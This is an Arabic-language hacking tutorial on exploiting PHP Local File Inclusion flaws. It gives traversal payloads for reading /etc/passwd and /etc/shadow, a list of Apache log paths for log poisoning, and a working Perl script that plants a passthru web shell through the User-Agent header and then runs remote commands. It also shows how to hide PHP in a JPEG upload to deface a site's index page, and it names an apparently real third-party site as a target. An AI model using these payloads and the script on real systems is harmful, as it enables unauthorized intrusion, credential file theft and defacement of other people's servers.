النهاردا هنشرح شرح كامل عن ثغرات ال Local File Inclusion
انت تفحص اسكربت مثلا للبحث عن ثغرات فوجدة هذا الكود
كود:
<?php
$page = $_GET[page];
include($page);
?>
هذا يعنى بوجود ثغرة من نوع Local File Inclusion
طيب تقولى اية المتغير تبع هذا الكود اقولك المتغير بيكون هكذا: (page)
طيب كيف الاستثمار يا بطل اقولك الاستثمار سهل جدا
وهو يكون كا التالى :
كود:
victim.com/index.php?page=../../../../../../../etc/ passwd
index.php
: دا الملف الى فية الكود المصاب pages دا المتغير وهكذا سوف يظهر ليك
الاسم وباسورد المواقع الى على السرفر تقولى ازاى اقول شوف
زى مانتم شيفين الصندوق الى بالون الاحمر دا يعتبر اليوزر والون الاخر دا الباس مشفر يكون على هذا الرتم دائما
كود:
username: passwd:UID:GID:full_name:directory:shell
اما السرفر الى بنشرح علية يكون بهذا الطريقة مشفر :
كود:
username:x:503:100:FullName:/home/username:/bin/sh
ودى بعض الاوامر ممكن تسخدمها لطلب اليوزر والياسورد فى السرفر
كود:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
وهذا ايظا نفس الشكل شوف معاى :
كود:
<?php
$page = $_GET["page"];
include("$page.php");
?>
ويكون الاستغلال كما شرحنا هكذا :
كود:
victim.com/index.php?file=../../../../../../../../ etc/passwd%00
اواامر راح تفيدك :
كود:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
معى ايضا اسكربت من نوع بيرل يمكن من خلالة الحقن الملفات شوف معاى
كود:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="<? passthru(\$_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sucssefully injected in $log \n";
print "\nType command to run or exit to end: ";
$cmd = <STDIN>;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = <STDIN>;
}
التغيرات تقوم بتغير ال victim.com ل اسم الموقع و folder الى انت فية وتغير ال index.php ب المملف الى عاوز تحقن بية تمام كدا ؟
تمام اوى كدا هذا كان شرح على كيفية الاكتشاف والاستغلال طيب انا بشرح طريقة كيفية الاختراق من هذة الثغرة
الكل يترك ها الثغرة ولاكن انها ثغرة قوية جدا :
طيب انا معاى موقع مصاب بصرف النظر عن نوع الاسكربت والى معاى النهاردا 4images
كود:
http://www.sfhs.eget.net/gallery/index.php?template=../../../../../../../etc/passwd%00
طيب كدا فى ثغرة فى ها الملف واكيد الكل عرفها طيب وبعدين اقولك
دور على اى مركز تحميل فى الموقع اكيد راح تلاقى مثل فى المنتديات مركز تحميل من اى نوع اكيد بتلاقى طيب وبعدين يا عم ؟!!!
دور على اى صورة على الجهاز ياريت تكون صورة عادية
ونروح للبرنامج اسمه EdjpgCom.exe
نعمل ادد على الصورة ونضيف اى كود بتريدة ,,, وانا معاى طريقة تجعلك تخترق على طول بدون قلق عن طريق التغير فى الرئسية
بكتابة الكود هذا فقط ؟؟؟
كود:
<? ob_clean(); system (" echo Mohandko... WaS... hErE index.php"); die; ?>
غير الكلام الى هنا والى تريدة سوف يظهر فى الرئسية
عن طريق طلب الصورة مثلا احنا رفعنها على مركز تحميل وكان الامتداد كدا
كود:
victim.com/forum/uploads/mohandko.jpg
ازاى بقى تسطعرضها هقولك سهلة جدا
كود:
victim.com/index.php=../../../../../../../../../forum/uploads/mohandkor.jpg
ومش لازم ترفع على الموقع هذا ممكن ترفعه على اى موقع بالسرفر اكيد بتلاقى موقع فية مركز رفع وتطلبة كدا مثلا :
كود:
victim.com/index.php=../../../../../../../../../ho me/user/public_html/forum/uploads/mohandko.jpg
بعد الاستعراض الصورة روح اعمل رفرش راح تلاقى الاندكس تبعك
لتحميل برنامج EdjpgCom
www.shr7.org/Mohandko/EdjpgCom.rar